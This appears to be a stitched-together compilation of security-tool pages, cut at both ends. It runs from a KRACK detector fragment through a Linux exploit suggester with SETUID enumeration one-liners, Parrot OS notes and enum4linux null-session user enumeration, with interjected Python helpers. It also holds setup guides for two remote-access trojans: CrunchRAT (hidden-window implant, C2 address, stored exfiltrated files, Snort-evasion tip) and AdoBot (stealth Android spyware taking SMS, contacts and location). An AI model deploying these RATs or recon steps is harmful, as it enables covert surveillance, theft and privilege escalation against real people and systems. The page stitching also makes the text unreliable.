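    """Replay a constructed handshake; returns the alerts raised (list of client MACs)."""
    det = KrackDetector(max_msg3)
    frames = [(AP, STA, build_eapol_key(MSG1, 1)), (STA, AP, build_eapol_key(MSG2, 1)),
              (AP, STA, build_eapol_key(MSG3, 2))]
    if retransmit_msg3:                    # AP sends message 3 again before message 4 arrives
        frames.append((AP, STA, build_eapol_key(MSG3, 3)))
    frames.append((STA, AP, build_eapol_key(MSG4, 3)))
    return [a for a in (det.feed(*f) for f in frames) if a]


if __name__ == "__main__":
    print("clean handshake:", run_scenario(False))
    print("duplicate message 3:", run_scenario(True))
```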


Linux Soft Exploit Suggester - Search Exploitable Software On Linux


linux-soft-exploit-suggester finds exploits for all vulnerable software in a system helping with the privilege escalation. It focuses on software packages instead of Kernel vulnerabilities.



> python linux-soft-exploit-suggester.py -h


linux-soft-exploit-suggester:
Search for Exploitable Software from package list.

optional arguments:
-h, --help Show this help message and exit
-f FILE, --file FILE Package list file
--clean Use clean package list, if used 'dpkg-query -W'
--duplicates Show duplicate exploits
--db DB Exploits csv file [default: file.csv]
--update Download latest version of exploits db
-d debian|redhat, --distro debian|redhat
Linux flavor, debian or redhat [default: debian]
--dos Include DoS exploits
--intense Include intense package name search,
when software name doesn't match package name (experimental)
-l 1-5, --level 1-5 Software version search variation [default: 1]
level 1: Same version
level 2: Micro and Patch version
level 3: Minor version
level 4: Major version
level 5: All versions
--type TYPE Exploit type; local, remote, webapps, dos.
e.g. --type local
--type remote
--filter FILTER Filter exploits by string
e.g. --filter "escalation"

usage examples:
Get Package List:
debian/ubuntu: dpkg -l > package_list
redhat/centos: rpm -qa > package_list

Update exploit database:
python linux-soft-exploit-suggester.py --update

Basic usage:
python linux-soft-exploit-suggester.py --file package_list

Specify exploit db:
python linux-soft-exploit-suggester.py --file package_list --db file.cve

Use Redhat/Centos format file:
python linux-soft-exploit-suggester.py --file package_list --distro redhat

Search exploit for major version:
python linux-soft-exploit-suggester.py --file package_list --level 4

Filter by remote exploits:
python linux-soft-exploit-suggester.py --file package_list --type remote

Search specific words in exploit title:
python linux-soft-exploit-suggester.py --file package_list --filter Overflow

Advanced usage:
python linux-soft-exploit-suggester.py --file package_list --level 3 --type local --filter escalation

Output
> python linux-soft-exploit-suggester.py --file packages --db file.csv

| _ __ _ _ | _ _ | _ | __ __ __ _ __ | _ _
|·| || |\/ (_ | ||_ |- /_)\/| \|| |·|- (_ | || )| )/_)(_ |- /_)|
||| ||_|/\ __)|_|| |_ \_ /\|_/||_|||_ __)|_||_/ |_/ \_ __) |_ \_ |
| _/ _/

[+] DNSTracer 1.9 - Buffer Overflow - local
From: dnstracer 1.9
File: /usr/share/exploitdb/platforms/linux/local/42424.py
Url: https://www.exploit-db.com/exploits/42424
[+] GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution - remote
From: wget 1.17.1
File: /usr/share/exploitdb/platforms/linux/remote/40064.txt
Url: https://www.exploit-db.com/exploits/40064
[+] GNU Screen 4.5.0 - Privilege Escalation (PoC) - local
From: screen 4.3.1
File: /usr/share/exploitdb/platforms/linux/local/41152.txt
Url: https://www.exploit-db.com/exploits/41152
[+] Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit) - local
From: ghostscript 9.21
File: /usr/share/exploitdb/platforms/linux/local/41955.rb
Url: https://www.exploit-db.com/exploits/41955
[+] KeepNote 0.7.8 - Command Execution - local
From: keepnote 0.7.8
File: /usr/share/exploitdb/platforms/multiple/local/40440.py
Url: https://www.exploit-db.com/exploits/40440
[+] MAWK 1.3.3-17 - Local Buffer Overflow - local
From: mawk 1.3.3
File: /usr/share/exploitdb/platforms/linux/local/42357.py
Url: https://www.exploit-db.com/exploits/42357
[+] Sudo 1.8.20 - 'get_process_ttyname()'Privilege Escalation - local
From: sudo 1.8.20
File: /usr/share/exploitdb/platforms/linux/local/42183.c
Url: https://www.exploit-db.com/exploits/42183

...

Generate package list

Debian
dpkg -l > package_list

Red Hat
rpm -qa > package_list

TIP. Packages from running processes and SETUID binaries

Running packages
> for i in $(ps auex | sed -e ':l;s/  / /g;t l' | cut -d' ' -f11 | grep -v '\[' | grep '/' | sort -u); \
do \
dpkg -l | grep "^ii  $(dpkg -S "$i" 2>&1 | cut -d':' -f1) " | tee -a potentials; \
done

SETUID Binaries
> for i in $(find / \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null); \
do \
dpkg -l | grep "^ii  $(dpkg -S "$i" 2>&1 | cut -d':' -f1) " | tee -a potentials; \
done

Eliminate duplicates and Run
> sort -u potentials > potentials_no_duplicates
> python linux-soft-exploit-suggester.py --file potentials_no_duplicates --level 2 --type local

| _ __ _ _ | _ _ | _ | __ __ __ _ __ | _ _
|·| || |\/ (_ | ||_ |- /_)\/| \|| |·|- (_ | || )| )/_)(_ |- /_)|
||| ||_|/\ __)|_|| |_ \_ /\|_/||_|||_ __)|_||_/ |_/ \_ __) |_ \_ |
| _/ _/

[+] Sudo 1.8.20 - 'get_process_ttyname()'Privilege Escalation - local
From: sudo 1.8.20
File: /usr/share/exploitdb/platforms/linux/local/42183.c
Url: https://www.exploit-db.com/exploits/42183
[+] Fuse 2.9.3-15 - Privilege Escalation - local
From: fuse 2.9.7
File: /usr/share/exploitdb/platforms/linux/local/37089.txt
Url: https://www.exploit-db.com/exploits/37089
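As an added example (my own Python, not the suggester's code), here is the core of what the tool does with --file, --level and --filter: parse a dpkg -l or rpm -qa listing (the "Generate package list" step above) into installed upstream versions, then match them against exploit records with a configurable version tolerance. The dpkg/rpm samples and the exploit rows below are constructed for the example; the `components` argument (how many leading version components must agree, 0 = any version) is my simplification of the tool's --level table, not its exact semantics; the function names are mine.

```python
import re
from typing import Dict, List, Tuple

# Constructed `dpkg -l` sample (not captured from a real host).
DPKG_SAMPLE = """\
Desired=Unknown/Install/Remove/Purge/Hold
||/ Name            Version              Architecture Description
+++-===============-====================-============-============================
ii  sudo            1.8.20-1             amd64        Provide limited super user privileges
ii  wget            1.17.1-1ubuntu1      amd64        retrieves files from the web
ii  screen          4.3.1-2build1        amd64        terminal multiplexer
ii  libc6:amd64     2.23-0ubuntu10       amd64        GNU C Library: Shared libraries
rc  oldtool         0.9-1                all          removed, only config files remain
"""

# Constructed `rpm -qa` sample: NAME-VERSION-RELEASE.ARCH per line.
RPM_SAMPLE = """\
sudo-1.8.19p2-14.el7_5.x86_64
wget-1.14-15.el7_4.1.x86_64
screen-4.1.0-0.25.20120314git3c2946.el7.x86_64
"""

# Constructed exploit records: (title, software, version named in the title).
# The real suggester reads these from an exploit-db csv.
EXPLOITS: List[Tuple[str, str, str]] = [
    ("Sudo 1.8.20 - 'get_process_ttyname()' Privilege Escalation", "sudo", "1.8.20"),
    ("GNU Screen 4.5.0 - Privilege Escalation (PoC)", "screen", "4.5.0"),
    ("GNU Wget 1.17.1 - Arbitrary File Upload", "wget", "1.17.1"),
    ("Sudo 1.6.8 - Environment Variable Handling", "sudo", "1.6.8"),
]


def upstream_version(v: str) -> str:
    """Drop a Debian epoch ('1:') and the packaging revision ('-1ubuntu1')."""
    if ":" in v:
        v = v.split(":", 1)[1]
    return v.split("-", 1)[0]


def parse_dpkg(text: str) -> Dict[str, str]:
    """Installed packages from `dpkg -l`: only 'ii' rows are actually installed."""
    pkgs: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] != "ii":
            continue
        name = parts[1].split(":", 1)[0]          # drop multi-arch suffix (libc6:amd64)
        pkgs[name] = upstream_version(parts[2])
    return pkgs


RPM_RE = re.compile(r"^(?P<name>.+)-(?P<ver>[^-]+)-(?P<rel>[^-]+)\.(?P<arch>[^.]+)$")


def parse_rpm(text: str) -> Dict[str, str]:
    """Installed packages from `rpm -qa`; the package name itself may contain hyphens."""
    pkgs: Dict[str, str] = {}
    for line in text.splitlines():
        m = RPM_RE.match(line.strip())
        if m:
            pkgs[m.group("name")] = upstream_version(m.group("ver"))
    return pkgs


def version_tuple(v: str) -> Tuple[int, ...]:
    """'1.8.19p2' -> (1, 8, 19): numeric prefix of each dotted component."""
    out = []
    for comp in v.split("."):
        m = re.match(r"\d+", comp)
        if not m:
            break
        out.append(int(m.group()))
    return tuple(out)


def versions_match(installed: str, affected: str, components: int) -> bool:
    """True when the first `components` numeric parts agree (0 = any version).
    A value larger than the version length amounts to an exact match."""
    if components == 0:
        return True
    a, b = version_tuple(installed), version_tuple(affected)
    return a[:components] == b[:components]


def suggest(pkgs: Dict[str, str], components: int = 99, title_filter: str = "") -> List[str]:
    """Exploit titles whose software is installed in a matching version.
    `title_filter` mirrors the tool's --filter (case-insensitive substring)."""
    hits = []
    for title, software, affected in EXPLOITS:
        installed = pkgs.get(software)
        if installed is None:
            continue
        if title_filter and title_filter.lower() not in title.lower():
            continue
        if versions_match(installed, affected, components):
            hits.append(f"[+] {title}  (installed: {software} {installed})")
    return hits


if __name__ == "__main__":
    debian = parse_dpkg(DPKG_SAMPLE)
    for line in suggest(debian, components=99):
        print(line)
    print("--- components=2, filter 'escalation' ---")
    for line in suggest(debian, components=2, title_filter="escalation"):
        print(line)
```

Only the upstream part of the version is compared, so distribution backports (a patched 1.8.20-1ubuntu2) still show up as hits; treat the list as candidates to verify on the box, not as confirmed vulnerabilities.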


CrunchRAT - HTTPS-based Remote Administration Tool (RAT)


CrunchRAT currently supports the following features:
  • File upload
  • File download
  • Command execution
It is currently single-threaded (only one task at a time), but multi-threading (or multi-tasking) is in the works. Additional features will be added at a later date.

Server
The server side of the RAT uses PHP and MySQL. It has been tested and works on the following:
  • Ubuntu 15.10 (Desktop or Server edition)
  • Ubuntu 16.04 (Desktop or Server edition)
Once the latest RAT code has been downloaded, there will be three directories:
  • Client - Contains implant code (ignore for this section)
  • Server - Contains server code
  • Setup - Contains setup files

Dependencies Setup
  1. Within the Setup directory there are two dependency setup shell scripts. If you are using Ubuntu 15.10 run sh 15_10_dependencies.sh; if you are using Ubuntu 16.04 run sh 16_04_dependencies.sh. Note: this must be run as root; without root privileges the script will fail.
  2. When asked for a new MySQL root password, please choose one that is complex. This information is needed at a later step.

HTTPS Setup
  1. CrunchRAT uses a self-signed certificate to secure communication between the server and the implant. Run the https_setup.sh shell script within the Setup directory to automate the HTTPS setup. Note: this must be run as root; without root privileges the script will fail. When asked to fill out the certificate information (Country Name, etc.), fill in every field: Snort rules already exist that alert on the default values of a dummy OpenSSL certificate, so don't be the one who gets flagged for leaving them blank.

Database Setup
  1. Run the database_setup.sh shell script within the Setup directory to setup the MySQL database.
  2. CrunchRAT creates a default account with the credentials admin:changeme. Log into the web interface of the RAT and change it: go to Account Management --> Change Password and pick something more complex. Additional RAT users can be provisioned using Account Management --> Add Users.

Miscellaneous Setup
  1. Copy all files from the Server directory to the webroot.
  2. You will also want to create a downloads directory. Note: it is absolutely critical that this folder is not inside the webroot, otherwise the web server could serve the exfiltrated files to anyone who finds the path. I typically create this directory under /home/<USERNAME>. Make sure www-data can access it: sudo chown www-data:www-data downloads. This directory stores all of the files downloaded from the infected system(s).
  3. In the webroot, open the config/config.php file. This is the main RAT configuration file. Make sure that you update all of the variables (downloadsPath, dbUser, dbPass, etc) to match your environment.

Client
The CrunchRAT implant is written in C# for simplicity. The C# binary has no persistence mechanism in place, but a C++ stager is in the works.
Targeted Framework: .NET Framework 3.5 (enabled by default on Windows 7 systems)
  1. Create a new console project in Visual Studio
  2. Copy implant.cs code from Client directory and add it to the project.
  3. Change Output Type to Windows Application (this will hide the command window) (Project --> Properties --> Output Type).
  4. Make sure Target Framework is .NET Framework 3.5.
  5. In the actual code, there will be a variable called c2 - Change this variable to the IP address or domain name of the C2 server
  6. Compile and your implant executable is ready to run.


ADO Bot - Android Remote Admin Tool

It's rather self-explanatory: this is an Android RAT with the following features:

Features
Realtime command execution
Schedule commands
Hidden app icon (stealth mode)
Fetch SMS in
Fetch call logs
Fetch contacts
Send SMS command
Forward received/sent SMS
Monitor location
Update apk remotely
Data collected are retained in database
Realtime notifications about device status
Transfer bot reporting to another server
For android 6 and above:
You can view the permissions of the app
The app asks for the permission when a command needing it is sent and that permission has not been granted yet
Panel Setup Info:
Server Setup
Create app on Heroku
Sign up to Heroku
Create a new app (Click the New button in the top right of the dashboard)
Name your app to whatever you want. Let’s name it your-app for example purposes
Setup Mysql Server
Go to “Resources” tab
In the “Addons” section, type “ClearDB” and select the first suggestion
Click Provision when prompted
Configure the app
Go to the settings tab of your new app
Click Reveal Config Vars button
Copy the VALUE of CLEARDB_DATABASE_URL KEY
Create a new KEY named DATABASE_URL and the paste into the VALUE field the copied value of CLEARDB_DATABASE_URL. Click ADD to save.
Create a new KEY named ADMIN_USERNAME and the VALUE will be your desired username used to login into the panel later. Then click ADD button
Create a new KEY named ADMIN_PASSWORD and the VALUE will be your desired password used to login into the panel later. Then click ADD button
Upload the source to Heroku
Download and install Heroku CLI as outlined here
If you don’t have git command line tool, you might as well install it
After installation of Heroku CLI, open command line and type:
$ heroku login
Enter your login email and password
Go to “Settings” tab
Find the “Info” section and copy the Heroku Git URL field. It looks like https://git.heroku.com/your-app.git
Download this repository and extract the contents of the zip file
Then cd into the extracted directory, e.g. cd ~/Downloads/AdoBot
Then enter the commands below (Remember to change your-app to the name of your app)
$ git init
$ git remote add heroku https://git.heroku.com/your-app.git
$ git add .
$ git commit -am "initial commit"
$ git push heroku master
$ heroku open
That's it, you're done! Now set up the AdoBot Android client if you haven't done it yet.
Development
System Requirements
NodeJS
MySql
Setup
Create adobot mysql schema/database.
Edit ./config/config.json to your preferences.
Install dependencies:
$ sudo npm install -g sequelize-cli gulp gulp-cli
$ npm install
Run local server

$ node index.js
Browse to http://127.0.0.1:3000
This includes both the actual Bot and The Panel:
Bot: https://github.com/adonespitogo/AdoBot
Panel: https://github.com/adonespitogo/AdoBot-IO

“For Educational Purposes Only”

Parrot Security 3.9 - Security GNU/Linux Distribution Designed with Cloud Pentesting and IoT Security in Mind


Security GNU/Linux distribution designed with cloud pentesting and IoT security in mind.

It includes a full portable laboratory for security and digital forensics experts, but also everything you need to develop your own software or to protect your privacy with anonymity and crypto tools.


Details

Security

Parrot Security includes a full arsenal of security-oriented tools to perform penetration tests, security audits and more. With a Parrot USB drive in your pocket you can be sure to always have everything you need with you.

Privacy

Parrot includes by default TOR, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt, luks and many other technologies designed to defend your privacy and your identity.

Development

If you need a comfortable environment with updated frameworks and useful libraries already installed, Parrot will amaze you: it includes a full development-oriented environment with powerful editors and IDEs pre-installed, and many other tools installable from our repository.

Features

System Specs
  • Debian GNU/Linux 9 (stretch)
  • Custom hardened Linux 4.8 kernel
  • Rolling release updates
  • Powerful worldwide mirror servers
  • High hardware compatibility
  • Community-driven development
  • free(libre) and open source project

Cryptography

Parrot includes a lot of cryptographic software, which is extremely useful for protecting your confidential data and defending your privacy.

Parrot includes several cryptographic front-ends for both symmetric and asymmetric encryption; in fact it natively supports volume encryption with LUKS, TrueCrypt and VeraCrypt, including hidden TrueCrypt/VeraCrypt volumes with nested algorithms.

The whole system can be installed inside an encrypted partition to protect your computer in case of theft.

Another Swiss army knife for your privacy is GPG, the GNU Privacy Guard, a powerful OpenPGP implementation that lets you create a private/public key pair to apply digital signatures to your messages and to allow other people to send you encrypted messages that only your private key can decrypt. It can also handle multiple identities and subkeys, and its strength lies in the web of trust: PGP users sign each other's keys so that others can judge whether a digital identity is valid.

Even our software repository is digitally signed with GPG: the system automatically verifies whether an update was altered or compromised and refuses to upgrade or to install new software if our signature is missing or invalid.

Privacy

Your privacy is the most valuable thing you have in your digital life, and the whole Parrot team is exaggeratedly paranoid about it: the system contains no tracking components and is hardened in depth to protect users from prying eyes.

Parrot has developed and implemented several tricks and tools to achieve this goal, and AnonSurf is one of the most important: it starts TOR and forces all of the system's internet traffic through the TOR network. The system has also been modified to use DNS servers other than those offered by your internet provider.

Parrot also includes torbrowser, torchat and other anonymous services, like I2P, a powerful alternative to TOR.

Programming

The main goal of an environment designed by hackers for hackers is the possibility to change it, adapt it, transform it and use it as a development platform to create new things. This is why Parrot comes out of the box with several tools for developers: compilers, disassemblers, IDEs, comfortable editors and powerful frameworks.

Parrot includes Qt Creator as its main C, C++ and Qt IDE. Another very useful tool is Geany, a lightweight and simple IDE that supports a huge number of programming languages; we also include Atom, the open-source editor developed by GitHub, and many compilers and interpreters with their most important libraries are pre-installed and ready to use.


And of course many other editors, development tools and libraries are available through our software repository, where we keep all the development tools updated to their most cutting-edge yet reliable version.

Changelog

Parrot 3.9 is now ready, and it includes some important new features introduced to make the system more secure and reliable.
The most important is the new sandbox system, introduced to protect many applications from 0-day attacks out of the box. The sandbox is based on firejail, a setuid program that is easy to configure and customize to protect critical applications quickly and effectively (if an application does not work as expected, customize the corresponding firejail profile to be more permissive).

enum4linux - Tool for Enumerating Information from Windows and Samba Systems

 


Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
Enum4linux is a tool for enumerating information from Windows and Samba systems.
It is written in Perl and is basically a wrapper around the Samba tools smbclient, rpcclient, net and nmblookup.



Key features 
  • RID cycling (When RestrictAnonymous is set to 1 on Windows 2000)
  • User listing (When RestrictAnonymous is set to 0 on Windows 2000)
  • Listing of group membership information
  • Share enumeration
  • Detecting if host is in a workgroup or a domain
  • Identifying the remote operating system
  • Password policy retrieval (using polenum)

Overview

Enum4linux attempts to offer similar functionality to enum.exe, formerly available from www.bindview.com.
The tool usage can be found below followed by examples, previous versions of the tool can be found at the bottom of the page.

Dependencies

You will need to have the Samba package installed as this script is basically just a wrapper around rpcclient, net, nmblookup and smbclient.

Usage 
$ enum4linux.pl -h
enum4linux v0.8.2 (https://labs.portcullis.co.uk/application/enum4linux/)
Copyright (C) 2006 Mark Lowe (mrl@portcullis-security.com)

Simple wrapper around the tools in the samba package to provide similar functionality
to enum (http://www.bindview.com/Services/RAZOR/Utilities/Windows/enum_readme.cfm).
Some additional features such as RID cycling have also been added for convenience.

This is an ALPHA release only.  Some of the options supported by the original "enum"
aren't implemented in this release.

Usage: /usr/local/bin/enum4linux.pl [options] ip

Options are (like "enum"):
-U             get userlist
-M             get machine list*
-N             get namelist dump (different from -U|-M)*
-S             get sharelist
-P             get password policy information*
-G             get group and member list
-L             get LSA policy information*
-D             dictionary crack, needs -u and -f*
-d             be detailed, applies to -U and -S
-u username    specify username to use (default "")
-p password    specify password to use (default "")
-f filename    specify dictfile to use (wants -D)*

* = Not implemented in this release.

Additional options:
-a             Do all simple enumeration (-U -S -G -r -o -n)
-h             Display this help message and exit
-r             enumerate users via RID cycling
-R range       RID ranges to enumerate (default: 500-550,1000-1050, implies -r)
-s filename    brute force guessing for share names
-k username    User(s) that exists on remote system (default: administrator,guest,krbtgt,domain admins,root,bin,none)
Used to get sid with "lookupsid known_username"
Use commas to try several users: "-k admin,user1,user2"
-o             Get OS information
-i             Get printer information
-w workgroup   Specify workgroup manually (usually found automatically)
-n             Do an nmblookup (similar to nbtstat)
-v             Verbose.  Shows full commands being run (net, rpcclient, etc.)

RID cycling should extract a list of users from Windows (or Samba) hosts which have
RestrictAnonymous set to 1 (Windows NT and 2000), or "Network access: Allow
anonymous SID/Name translation" enabled (XP, 2003).

If no usernames are known, good names to try against Windows systems are:
- administrator
- guest
- none
- helpassistant
- aspnet

The following might work against samba systems:
- root
- nobody
- sys

NB: Samba servers often seem to have RIDs in the range 3000-3050.

Examples

Below are examples which demonstrate most of the features of enum4linux. Output has been edited for brevity in most cases.

Verbose mode
Before we delve into the features of enum4linux, it's worth pointing out that verbose mode shows you the underlying commands being run by enum4linux (rpcclient, smbclient, etc.). This is useful if you want to run those commands manually but can't figure out the syntax. Note the lines beginning with [V] in the output below:
$ enum4linux.pl -v 192.168.2.55
[V] Dependent program "nmblookup" found in /usr/bin/nmblookup
[V] Dependent program "net" found in /usr/bin/net
[V] Dependent program "rpcclient" found in /usr/bin/rpcclient
[V] Dependent program "smbclient" found in /usr/bin/smbclient
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:18:51 2008

----- Enumerating Workgroup/Domain on 192.168.2.55 ------
[V] Attempting to get domain name with command: nmblookup -A '192.168.2.55'
[+] Got domain/workgroup name: WORKGROUP

----- Getting domain SID for 192.168.2.55 -----
[V] Attempting to get domain SID with command: rpcclient -U''%'' 192.168.2.55 -c 'lsaquery' 2>&1
Domain Name: WORKGROUP
Domain Sid: S-0-0
[+] Host is part of a workgroup (not a domain)

----- Session Check on 192.168.2.55 -----
[V] Attempting to make null session using command: smbclient //'192.168.2.55'/ipc$ -U''%'' -c 'help' 2>&1
[+] Server 192.168.2.55 allows sessions using username '', password ''

The “Do Everything” option
As you read through the following section you’ll probably think that there are a lot of options you need to remember. If you just want enum4linux to try to enumerate all the information it can from a remote host, just use the -a option:
$ enum4linux.pl -a 192.168.2.55
NB: This won’t do dictionary-based share name guessing, but does pretty much everything else.

Obtain list of usernames (RestrictAnonymous = 0)
This feature is similar to enum.exe -U IP. It returns a complete list of usernames if the server allows it. On Windows 2000 the RestrictAnonymous registry setting must be 0 for this to work. The user list is shown twice, in two different formats, because two different underlying rpcclient commands (querydispinfo and enumdomusers) are used to retrieve the data.
$ enum4linux.pl -U 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 27 16:02:50 2008

----- Users on 192.168.2.55 -----
index: 0x1 RID: 0x1f4 acb: 0x210 Account: Administrator Name: Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3ee acb: 0x10 Account: basic Name: basic Desc:
index: 0x3 RID: 0x3ed acb: 0x10 Account: blah Name: Desc:
index: 0x4 RID: 0x1f5 acb: 0x215 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e9 acb: 0x214 Account: IUSR_PORTCULLIS Name: Internet Guest Account Desc: Built-in account for anonymous access to Internet Information Services
index: 0x6 RID: 0x3ea acb: 0x214 Account: IWAM_PORTCULLIS Name: Launch IIS Process Account Desc: Built-in account for Internet Information Services to start out of process applications
index: 0x7 RID: 0x3ec acb: 0x10 Account: mark Name: Desc:
index: 0x8 RID: 0x3e8 acb: 0x214 Account: TsInternetUser Name: TsInternetUser Desc: This user account is used by Terminal Services.

user:[Administrator] rid:[0x1f4]
user:[basic] rid:[0x3ee]
user:[blah] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[IUSR_PORTCULLIS] rid:[0x3e9]
user:[IWAM_PORTCULLIS] rid:[0x3ea]
user:[mark] rid:[0x3ec]
user:[TsInternetUser] rid:[0x3e8]

Obtain a list of usernames (using authentication)
If you’ve managed to obtain a username and password for the host, you can use it to retrieve a complete list of users regardless of RestrictAnonymous settings. In the example below we use the administrator account, but any account will do:
$ enum4linux.pl -u administrator -p password -U 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 13:19:35 2008

----- Users on 192.168.2.55 -----
index: 0x1 RID: 0x1f4 acb: 0x210 Account: Administrator Name: Desc: Built-in account for administering the computer/domain
index: 0x2 RID: 0x3ee acb: 0x10 Account: basic Name: basic Desc:
index: 0x3 RID: 0x3ed acb: 0x10 Account: blah Name: Desc:
index: 0x4 RID: 0x1f5 acb: 0x215 Account: Guest Name: Desc: Built-in account for guest access to the computer/domain
index: 0x5 RID: 0x3e9 acb: 0x214 Account: IUSR_PORTCULLIS Name: Internet Guest Account Desc: Built-in account for anonymous access to Internet Information Services
index: 0x6 RID: 0x3ea acb: 0x214 Account: IWAM_PORTCULLIS Name: Launch IIS Process Account Desc: Built-in account for Internet Information Services to start out of process applications
index: 0x7 RID: 0x3ec acb: 0x10 Account: mark Name: Desc:
index: 0x8 RID: 0x3e8 acb: 0x214 Account: TsInternetUser Name: TsInternetUser Desc: This user account is used by Terminal Services.

user:[Administrator] rid:[0x1f4]
user:[basic] rid:[0x3ee]
user:[blah] rid:[0x3ed]
user:[Guest] rid:[0x1f5]
user:[IUSR_PORTCULLIS] rid:[0x3e9]
user:[IWAM_PORTCULLIS] rid:[0x3ea]
user:[mark] rid:[0x3ec]
user:[TsInternetUser] rid:[0x3e8]

Obtaining a List of Usernames via RID Cycling (RestrictAnonymous = 1)
To obtain the usernames corresponding to a default range of RIDs (500-550,1000-1050) use the -r option:
$ enum4linux.pl -r 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:27:21 2008

----- Target information -----
Target ........... 192.168.2.55
RID Range ........ 500-550,1000-1050
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

----- Users on 192.168.2.55 via RID cycling (RIDS: 500-550,1000-1050) -----
[I] Assuming that user "administrator" exists
[+] Got SID: S-1-5-21-1801674531-1482476501-725345543 using username '', password ''
S-1-5-21-1801674531-1482476501-725345543-500 W2KSQL\Administrator (Local User)
S-1-5-21-1801674531-1482476501-725345543-501 W2KSQL\Guest (Local User)
S-1-5-21-1801674531-1482476501-725345543-513 W2KSQL\None (Domain Group)
S-1-5-21-1801674531-1482476501-725345543-1000 W2KSQL\TsInternetUser (Local User)
S-1-5-21-1801674531-1482476501-725345543-1001 W2KSQL\IUSR_PORTCULLIS (Local User)
S-1-5-21-1801674531-1482476501-725345543-1002 W2KSQL\IWAM_PORTCULLIS (Local User)
S-1-5-21-1801674531-1482476501-725345543-1004 W2KSQL\mark (Local User)
S-1-5-21-1801674531-1482476501-725345543-1005 W2KSQL\blah (Local User)
S-1-5-21-1801674531-1482476501-725345543-1006 W2KSQL\basic (Local User)
You can specify a custom range of RIDs using the -R option. This implies -r, so you don't have to specify -r as well:
$ enum4linux.pl -R 500-520 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 11:27:53 2008

----- Target information -----
Target ........... 192.168.2.55
RID Range ........ 500-520
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

----- Users on 192.168.2.55 via RID cycling (RIDS: 500-520) -----
[I] Assuming that user "administrator" exists
[+] Got SID: S-1-5-21-1801674531-1482476501-725345543 using username '', password ''
S-1-5-21-1801674531-1482476501-725345543-500 W2KSQL\Administrator (Local User)
S-1-5-21-1801674531-1482476501-725345543-501 W2KSQL\Guest (Local User)
S-1-5-21-1801674531-1482476501-725345543-513 W2KSQL\None (Domain Group)
Before RID cycling can start, enum4linux needs to get the SID from the remote host. It does this by requesting the SID of a known username / group (pretty much the same thing every other RID-cycling tool does). You can see in the above output a list of known usernames. These are tried in turn, until enum4linux finds the SID of the remote host.
If you're very unlucky, this list won't be good enough and you won't be able to get the SID. In that case, use the -k option to specify a different known username:
$ enum4linux.pl -k anotheruser -R 500-520 192.168.2.55
You can specify a list using commas:
$ enum4linux.pl -k user1,user2,user3 -R 500-520 192.168.2.55

Group membership
If the remote host allows it, you can get a list of groups and their members using the -G option (as in enum.exe):
$ enum4linux.pl -G 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Mar 28 13:54:48 2008

----- Groups on 192.168.2.55 -----
[+] Getting builtin groups:
group:[Administrators] rid:[0x220]
group:[Backup Operators] rid:[0x227]
group:[Guests] rid:[0x222]
group:[Power Users] rid:[0x223]
group:[Replicator] rid:[0x228]
group:[Users] rid:[0x221]

[+] Getting builtin group memberships:
Group 'Guests' (RID: 546) has members:
W2KSQL\Guest
W2KSQL\TsInternetUser
W2KSQL\IUSR_PORTCULLIS
W2KSQL\IWAM_PORTCULLIS
Group 'Users' (RID: 545) has members:
NT AUTHORITY\INTERACTIVE
NT AUTHORITY\Authenticated Users
W2KSQL\mark
W2KSQL\blah
W2KSQL\basic
Group 'Replicator' (RID: 552) has members:
Group 'Power Users' (RID: 547) has members:
Group 'Administrators' (RID: 544) has members:
W2KSQL\Administrator
W2KSQL\mark
W2KSQL\blah
Group 'Backup Operators' (RID: 551) has members:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:
group:[None] rid:[0x201]

[+] Getting domain group memberships:
Group 'None' (RID: 513) has members:
W2KSQL\Administrator
W2KSQL\Guest
W2KSQL\TsInternetUser
W2KSQL\IUSR_PORTCULLIS
W2KSQL\IWAM_PORTCULLIS
W2KSQL\mark
W2KSQL\blah
W2KSQL\basic
As with the -U option for user enumeration, you can also specify -u user -p pass to provide login credentials if required. Any user account will do, you don’t have to be an admin.

Check if host is part of a domain or workgroup
Enum4linux uses rpcclient’s lsaquery command to ask for a host’s Domain SID. If we get a proper SID we can infer that it is part of a domain. If we get the answer S-0-0 we can infer the host is part of a workgroup. This is done by default, so no command line options are required:
$ enum4linux.pl 192.168.2.55
Starting enum4linux v0.8.2 ( https://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Mar 27 16:02:50 2008

----- Getting domain SID for 192.168.2.55 -----
Domain Name: WORKGROUP
Domain Sid: S-0-0
[+] Host is part of a workgroup (not a domain)
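As an added example (my own Python, not enum4linux's Perl), here is the logic behind the RID-cycling section and the domain/workgroup check above: expanding the -R range syntax, deriving the host or domain SID from a lookupnames answer for a known username, building the lookupsids command that enum4linux hands to rpcclient, and parsing its output into (RID, name, type) while skipping RIDs that do not resolve. The rpcclient output embedded below is constructed from the lines shown on this page plus one *unknown* line; the function names are mine, and the lookupnames answer format is an assumption to check against your Samba version.

```python
import re
from typing import List, Optional, Tuple

# Constructed rpcclient output: the three resolved lines are from this page's
# run, the `*unknown*` line is what rpcclient prints for a RID that does not exist.
LOOKUPSIDS_SAMPLE = r"""
S-1-5-21-1801674531-1482476501-725345543-500 W2KSQL\Administrator (Local User)
S-1-5-21-1801674531-1482476501-725345543-501 W2KSQL\Guest (Local User)
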